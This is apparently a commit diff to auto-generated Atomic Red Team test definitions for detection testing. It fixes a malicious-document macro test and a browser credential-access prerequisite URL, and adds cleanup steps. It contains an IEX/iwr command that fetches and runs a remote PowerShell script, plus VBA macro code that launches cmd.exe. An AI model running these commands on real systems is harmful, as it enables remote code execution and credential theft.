Generated docs from job=generate-docs branch=master [ci skip]

2023-12-14 04:47:22 +00:00
parent 8bca554bc8
commit 2dcdc27df7
4 changed files with 14 additions and 8 deletions
@@ -48355,8 +48355,11 @@ execution:
        command: |
          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
-          $macrocode = "   Open `"#{bat_path}`" For Output As #1`n   Write #1, `"calc.exe`"`n   Close #1`n   a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
+          $macrocode = "   Open `"#{bat_path}`" For Output As #1`n   Write #1, `"calc.exe`"`n   Close #1`n   a = Shell(`"cmd.exe /c #{bat_path} `", vbNormalFocus)`n"
          Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
+        cleanup_command: |
+          Remove-Item #{bat_path} -ErrorAction Ignore
+          Get-Process | Where-Object { $_.MainModule.FileName -like "*calculator*" } | Stop-Process
        name: powershell
    - name: Excel 4 Macro
      auto_generated_guid: 4ea1fc97-8a46-4b4e-ba48-af43d2a98052
@@ -84958,7 +84961,7 @@ credential-access:
          '
        prereq_command: if (Test-Path "PathToAtomicsFolder\T1555.003\src\Login Data")
          {exit 0} else {exit 1}
-        get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T155.003/src/LoginData?raw=true"
+        get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/src/Login%20Data?raw=true"
          -Outfile: "PathToAtomicsFolder\T1555.003\src\Login Data"'
      executor:
        command: |
@@ -39899,8 +39899,11 @@ execution:
        command: |
          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
-          $macrocode = "   Open `"#{bat_path}`" For Output As #1`n   Write #1, `"calc.exe`"`n   Close #1`n   a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
+          $macrocode = "   Open `"#{bat_path}`" For Output As #1`n   Write #1, `"calc.exe`"`n   Close #1`n   a = Shell(`"cmd.exe /c #{bat_path} `", vbNormalFocus)`n"
          Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
+        cleanup_command: |
+          Remove-Item #{bat_path} -ErrorAction Ignore
+          Get-Process | Where-Object { $_.MainModule.FileName -like "*calculator*" } | Stop-Process
        name: powershell
    - name: Excel 4 Macro
      auto_generated_guid: 4ea1fc97-8a46-4b4e-ba48-af43d2a98052
@@ -69460,7 +69463,7 @@ credential-access:
          '
        prereq_command: if (Test-Path "PathToAtomicsFolder\T1555.003\src\Login Data")
          {exit 0} else {exit 1}
-        get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T155.003/src/LoginData?raw=true"
+        get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/src/Login%20Data?raw=true"
          -Outfile: "PathToAtomicsFolder\T1555.003\src\Login Data"'
      executor:
        command: |
@@ -273,13 +273,13 @@ Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
 ```

 #### Cleanup Commands:
-
-
 ```powershell
-Remove-Item "#{bat_path}" -ErrorAction Ignore
+Remove-Item #{bat_path} -ErrorAction Ignore
 Get-Process | Where-Object { $_.MainModule.FileName -like "*calculator*" } | Stop-Process
 ```

+
+
 #### Dependencies:  Run with `powershell`!
 ##### Description: Microsoft #{ms_product} must be installed
 ##### Check Prereq Commands:
@@ -893,7 +893,7 @@ if (Test-Path "PathToAtomicsFolder\T1555.003\src\Login Data") {exit 0} else {exi
 ```
 ##### Get Prereq Commands:
 ```powershell
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T155.003/src/LoginData?raw=true" -Outfile: "PathToAtomicsFolder\T1555.003\src\Login Data"
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/src/Login%20Data?raw=true" -Outfile: "PathToAtomicsFolder\T1555.003\src\Login Data"
 ```